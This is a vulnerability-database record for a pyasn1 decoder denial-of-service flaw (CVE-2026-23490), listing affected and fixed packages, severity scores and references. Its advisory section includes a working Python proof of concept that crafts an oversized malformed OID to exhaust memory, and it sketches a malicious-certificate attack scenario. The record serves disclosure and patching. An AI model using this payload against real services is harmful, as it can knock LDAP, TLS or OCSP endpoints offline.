Lookup for vulnerabilities affecting packages.

Vulnerability_idVCID-bptp-5gn6-eucd
Summary
pyasn1 has a DoS vulnerability in decoder
### Summary

After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.

### Details

The integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496

### PoC

For the DoS:
```py
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource

# Deliberately set memory limit to display PoC
try:
    resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
    print("[*] Memory limit set to 100MB")
except:
    print("[-] Could not set memory limit")

# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])

print(f"[*] Testing with {payload_size_mb}MB payload...")

payload_size = payload_size_mb * 1024 * 1024
# Create payload with continuation octets
# Each 0x81 byte indicates continuation, causing bit shifting in decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)

# DER length encoding (supports up to 4GB)
if length < 128:
    length_bytes = bytes([length])
elif length < 256:
    length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
    length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
    length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
    # 4 bytes can handle up to 4GB
    length_bytes = b'\x84' + length.to_bytes(4, 'big')

# Use OID (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload

print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")

try:
    print("[*] Decoding (this may take time or exhaust memory)...")
    result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())

    print(f'[+] Decoded successfully')
    print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')

    # Try to convert to string
    print('[*] Converting to string...')
    try:
        str_result = str(result[0])
        print(f'[+] String succeeded: {len(str_result)} chars')
        if len(str_result) > 10000:
            print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')
    except MemoryError:
        print(f'[-] MemoryError during string conversion!')
    except Exception as e:
        print(f'[-] {type(e).__name__} during string conversion')

except MemoryError:
    print('[-] MemoryError: Out of memory!')
except Exception as e:
    print(f'[-] Error: {type(e).__name__}: {e}')


print("\n[*] Test completed")
```


Screenshots with the results:

#### DoS
<img width="944" height="207" alt="Screenshot_20251219_160840" src="https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f" />

<img width="931" height="231" alt="Screenshot_20251219_152815" src="https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa" />

#### Leak analysis

A potential heap leak was investigated but came back clean:
```
[*] Creating 1000KB payload...
[*] Decoding with pyasn1...
[*] Materializing to string...
[+] Decoded 2157784 characters
[+] Binary representation: 896001 bytes
[+] Dumped to heap_dump.bin

[*] First 64 bytes (hex):
  01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081

[*] First 64 bytes (ASCII/hex dump):
  0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02  ..... @..... @..
  0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08  ... @..... @....
  0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20  . @..... @..... 
  0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81  @..... @..... @.

[*] Digit distribution analysis:
  '0':  10.1%
  '1':   9.9%
  '2':  10.0%
  '3':   9.9%
  '4':   9.9%
  '5':  10.0%
  '6':  10.0%
  '7':  10.0%
  '8':   9.9%
  '9':  10.1%
```

### Scenario

1. An attacker creates a malicious X.509 certificate.
2. The application validates certificates.
3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.

### Impact

This issue can affect resource consumption and hang systems or stop services.
This may affect:
- LDAP servers
- TLS/SSL endpoints
- OCSP responders
- etc.

### Recommendation

Add a limit to the allowed bytes in the decoder.
Aliases
0
alias CVE-2026-23490
1
alias GHSA-63vm-454h-vhhq
Fixed_packages
0
url pkg:deb/debian/pyasn1@0.4.8-1?distro=trixie
purl pkg:deb/debian/pyasn1@0.4.8-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kth3-bvbt-gbgk
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-1%3Fdistro=trixie
1
url pkg:deb/debian/pyasn1@0.4.8-1%2Bdeb11u1?distro=trixie
purl pkg:deb/debian/pyasn1@0.4.8-1%2Bdeb11u1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-1%252Bdeb11u1%3Fdistro=trixie
2
url pkg:deb/debian/pyasn1@0.4.8-3?distro=trixie
purl pkg:deb/debian/pyasn1@0.4.8-3?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kth3-bvbt-gbgk
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-3%3Fdistro=trixie
3
url pkg:deb/debian/pyasn1@0.4.8-3
purl pkg:deb/debian/pyasn1@0.4.8-3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kth3-bvbt-gbgk
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-3
4
url pkg:deb/debian/pyasn1@0.4.8-3%2Bdeb12u1?distro=trixie
purl pkg:deb/debian/pyasn1@0.4.8-3%2Bdeb12u1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-3%252Bdeb12u1%3Fdistro=trixie
5
url pkg:deb/debian/pyasn1@0.6.1-1%2Bdeb13u1?distro=trixie
purl pkg:deb/debian/pyasn1@0.6.1-1%2Bdeb13u1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kth3-bvbt-gbgk
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.6.1-1%252Bdeb13u1%3Fdistro=trixie
6
url pkg:deb/debian/pyasn1@0.6.2-1?distro=trixie
purl pkg:deb/debian/pyasn1@0.6.2-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.6.2-1%3Fdistro=trixie
7
url pkg:deb/debian/pyasn1@0.6.3-1?distro=trixie
purl pkg:deb/debian/pyasn1@0.6.3-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.6.3-1%3Fdistro=trixie
8
url pkg:pypi/pyasn1@0.6.2
purl pkg:pypi/pyasn1@0.6.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kth3-bvbt-gbgk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/pyasn1@0.6.2
Affected_packages
0
url pkg:deb/debian/pyasn1@0.0.5a-2
purl pkg:deb/debian/pyasn1@0.0.5a-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.0.5a-2
1
url pkg:deb/debian/pyasn1@0.0.8a-1
purl pkg:deb/debian/pyasn1@0.0.8a-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.0.8a-1
2
url pkg:deb/debian/pyasn1@0.0.11a-1
purl pkg:deb/debian/pyasn1@0.0.11a-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.0.11a-1
3
url pkg:deb/debian/pyasn1@0.1.3-1
purl pkg:deb/debian/pyasn1@0.1.3-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.1.3-1
4
url pkg:deb/debian/pyasn1@0.1.7-1
purl pkg:deb/debian/pyasn1@0.1.7-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.1.7-1
5
url pkg:deb/debian/pyasn1@0.1.9-1~bpo8%2B1
purl pkg:deb/debian/pyasn1@0.1.9-1~bpo8%2B1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.1.9-1~bpo8%252B1
6
url pkg:deb/debian/pyasn1@0.1.9-2
purl pkg:deb/debian/pyasn1@0.1.9-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.1.9-2
7
url pkg:deb/debian/pyasn1@0.4.2-3
purl pkg:deb/debian/pyasn1@0.4.2-3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.2-3
8
url pkg:deb/debian/pyasn1@0.4.8-1
purl pkg:deb/debian/pyasn1@0.4.8-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
1
vulnerability VCID-kth3-bvbt-gbgk
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-1
9
url pkg:pypi/pyasn1@0.6.1
purl pkg:pypi/pyasn1@0.6.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
1
vulnerability VCID-kth3-bvbt-gbgk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/pyasn1@0.6.1
10
url pkg:rpm/redhat/automation-controller@4.6.26-1?arch=el8ap
purl pkg:rpm/redhat/automation-controller@4.6.26-1?arch=el8ap
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
1
vulnerability VCID-fm8w-bycx-4yex
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.6.26-1%3Farch=el8ap
11
url pkg:rpm/redhat/automation-controller@4.6.26-1?arch=el9ap
purl pkg:rpm/redhat/automation-controller@4.6.26-1?arch=el9ap
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
1
vulnerability VCID-fm8w-bycx-4yex
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.6.26-1%3Farch=el9ap
12
url pkg:rpm/redhat/automation-controller@4.7.9-1?arch=el9ap
purl pkg:rpm/redhat/automation-controller@4.7.9-1?arch=el9ap
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
1
vulnerability VCID-fm8w-bycx-4yex
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.7.9-1%3Farch=el9ap
13
url pkg:rpm/redhat/fence-agents@4.2.1-65.el8_4?arch=27
purl pkg:rpm/redhat/fence-agents@4.2.1-65.el8_4?arch=27
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.2.1-65.el8_4%3Farch=27
14
url pkg:rpm/redhat/fence-agents@4.2.1-89.el8_6?arch=21
purl pkg:rpm/redhat/fence-agents@4.2.1-89.el8_6?arch=21
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.2.1-89.el8_6%3Farch=21
15
url pkg:rpm/redhat/fence-agents@4.2.1-112.el8_8?arch=16
purl pkg:rpm/redhat/fence-agents@4.2.1-112.el8_8?arch=16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.2.1-112.el8_8%3Farch=16
16
url pkg:rpm/redhat/fence-agents@4.2.1-129.el8_10?arch=21
purl pkg:rpm/redhat/fence-agents@4.2.1-129.el8_10?arch=21
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.2.1-129.el8_10%3Farch=21
17
url pkg:rpm/redhat/fence-agents@4.10.0-20.el9_0?arch=28
purl pkg:rpm/redhat/fence-agents@4.10.0-20.el9_0?arch=28
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-20.el9_0%3Farch=28
18
url pkg:rpm/redhat/fence-agents@4.10.0-43.el9_2?arch=19
purl pkg:rpm/redhat/fence-agents@4.10.0-43.el9_2?arch=19
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-43.el9_2%3Farch=19
19
url pkg:rpm/redhat/fence-agents@4.10.0-62.el9_4?arch=22
purl pkg:rpm/redhat/fence-agents@4.10.0-62.el9_4?arch=22
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-62.el9_4%3Farch=22
20
url pkg:rpm/redhat/fence-agents@4.10.0-86.el9_6?arch=15
purl pkg:rpm/redhat/fence-agents@4.10.0-86.el9_6?arch=15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-86.el9_6%3Farch=15
21
url pkg:rpm/redhat/fence-agents@4.10.0-98.el9_7?arch=5
purl pkg:rpm/redhat/fence-agents@4.10.0-98.el9_7?arch=5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-98.el9_7%3Farch=5
22
url pkg:rpm/redhat/fence-agents@4.16.0-5.el10_0?arch=8
purl pkg:rpm/redhat/fence-agents@4.16.0-5.el10_0?arch=8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.16.0-5.el10_0%3Farch=8
23
url pkg:rpm/redhat/fence-agents@4.16.0-13.el10_1?arch=2
purl pkg:rpm/redhat/fence-agents@4.16.0-13.el10_1?arch=2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.16.0-13.el10_1%3Farch=2
24
url pkg:rpm/redhat/python-pyasn1@0.1.9-7.el7_9?arch=2
purl pkg:rpm/redhat/python-pyasn1@0.1.9-7.el7_9?arch=2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.1.9-7.el7_9%3Farch=2
25
url pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_2?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_2?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_2%3Farch=1
26
url pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_4?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_4?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_4%3Farch=1
27
url pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_6?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_6?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_6%3Farch=1
28
url pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_8?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_8?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_8%3Farch=1
29
url pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_10?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_10?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_10%3Farch=1
30
url pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_0?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_0?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_0%3Farch=1
31
url pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_2?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_2?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_2%3Farch=1
32
url pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_4?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_4?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_4%3Farch=1
33
url pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_6?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_6?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_6%3Farch=1
34
url pkg:rpm/redhat/python-pyasn1@0.4.8-7?arch=el9_7
purl pkg:rpm/redhat/python-pyasn1@0.4.8-7?arch=el9_7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-7%3Farch=el9_7
35
url pkg:rpm/redhat/python-pyasn1@0.6.2-1?arch=el10_1
purl pkg:rpm/redhat/python-pyasn1@0.6.2-1?arch=el10_1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.6.2-1%3Farch=el10_1
36
url pkg:rpm/redhat/python-pyasn1@0.6.2-1.el10_0?arch=1
purl pkg:rpm/redhat/python-pyasn1@0.6.2-1.el10_0?arch=1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.6.2-1.el10_0%3Farch=1
37
url pkg:rpm/redhat/resource-agents@4.1.1-61.el7_9?arch=23
purl pkg:rpm/redhat/resource-agents@4.1.1-61.el7_9?arch=23
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.1.1-61.el7_9%3Farch=23
38
url pkg:rpm/redhat/resource-agents@4.1.1-90.el8_4?arch=23
purl pkg:rpm/redhat/resource-agents@4.1.1-90.el8_4?arch=23
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.1.1-90.el8_4%3Farch=23
39
url pkg:rpm/redhat/resource-agents@4.9.0-16.el8_6?arch=20
purl pkg:rpm/redhat/resource-agents@4.9.0-16.el8_6?arch=20
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.9.0-16.el8_6%3Farch=20
40
url pkg:rpm/redhat/resource-agents@4.9.0-40.el8_8?arch=16
purl pkg:rpm/redhat/resource-agents@4.9.0-40.el8_8?arch=16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.9.0-40.el8_8%3Farch=16
41
url pkg:rpm/redhat/resource-agents@4.9.0-54.el8_10?arch=28
purl pkg:rpm/redhat/resource-agents@4.9.0-54.el8_10?arch=28
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bptp-5gn6-eucd
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.9.0-54.el8_10%3Farch=28
References
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-23490
reference_id
reference_type
scores
0
value 0.00021
scoring_system epss
scoring_elements 0.05876
published_at 2026-04-29T12:55:00Z
1
value 0.00021
scoring_system epss
scoring_elements 0.05866
published_at 2026-04-26T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05829
published_at 2026-04-24T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.05797
published_at 2026-04-21T12:55:00Z
4
value 0.00021
scoring_system epss
scoring_elements 0.05649
published_at 2026-04-18T12:55:00Z
5
value 0.00021
scoring_system epss
scoring_elements 0.05637
published_at 2026-04-16T12:55:00Z
6
value 0.00021
scoring_system epss
scoring_elements 0.05682
published_at 2026-04-13T12:55:00Z
7
value 0.00021
scoring_system epss
scoring_elements 0.05688
published_at 2026-04-12T12:55:00Z
8
value 0.00021
scoring_system epss
scoring_elements 0.05696
published_at 2026-04-11T12:55:00Z
9
value 0.00021
scoring_system epss
scoring_elements 0.05716
published_at 2026-04-09T12:55:00Z
10
value 0.00021
scoring_system epss
scoring_elements 0.0569
published_at 2026-04-08T12:55:00Z
11
value 0.00021
scoring_system epss
scoring_elements 0.05652
published_at 2026-04-07T12:55:00Z
12
value 0.00021
scoring_system epss
scoring_elements 0.05659
published_at 2026-04-04T12:55:00Z
13
value 0.00021
scoring_system epss
scoring_elements 0.05618
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-23490
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/pyasn1/pyasn1
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pyasn1/pyasn1
5
reference_url https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
6
reference_url https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/
url https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
7
reference_url https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
8
reference_url https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/
url https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
9
reference_url https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/
url https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
10
reference_url https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-23490
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-23490
12
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753
reference_id 1125753
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2430472
reference_id 2430472
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2430472
14
reference_url https://github.com/advisories/GHSA-63vm-454h-vhhq
reference_id GHSA-63vm-454h-vhhq
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-63vm-454h-vhhq
15
reference_url https://access.redhat.com/errata/RHSA-2026:1903
reference_id RHSA-2026:1903
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1903
16
reference_url https://access.redhat.com/errata/RHSA-2026:1904
reference_id RHSA-2026:1904
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1904
17
reference_url https://access.redhat.com/errata/RHSA-2026:1905
reference_id RHSA-2026:1905
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1905
18
reference_url https://access.redhat.com/errata/RHSA-2026:1906
reference_id RHSA-2026:1906
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1906
19
reference_url https://access.redhat.com/errata/RHSA-2026:2221
reference_id RHSA-2026:2221
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2221
20
reference_url https://access.redhat.com/errata/RHSA-2026:2299
reference_id RHSA-2026:2299
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2299
21
reference_url https://access.redhat.com/errata/RHSA-2026:2300
reference_id RHSA-2026:2300
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2300
22
reference_url https://access.redhat.com/errata/RHSA-2026:2302
reference_id RHSA-2026:2302
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2302
23
reference_url https://access.redhat.com/errata/RHSA-2026:2303
